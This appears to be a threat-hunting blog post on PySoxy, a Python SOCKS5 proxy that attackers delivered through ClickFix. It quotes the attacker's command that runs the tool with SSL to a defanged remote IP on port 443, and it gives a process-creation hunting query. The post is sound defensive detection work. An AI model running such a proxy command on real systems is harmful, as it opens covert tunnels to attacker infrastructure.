394. Hunting for PySoxy: Another Tool Delivered via ClickFix

Hello everyone!

Today we'll look at another tool delivered by threat actors via ClickFix. And this time it's a 10-year-old open-source Python SOCKS5 proxy - PySoxy.

So, according to ReliaQuest report, the adversary leveraged interactive PowerShell access to download Python tooling to C:\ProgramData

The following command was executed to run the tool:

python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97

The tool was identified as PySoxy. As you can see, there're a few interesting command line parameters we can use to build a hunting query, for example:

event_type: "processcreatewin"

AND

cmdline: ("remote_port" AND "remote_ip") 

See you soon!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access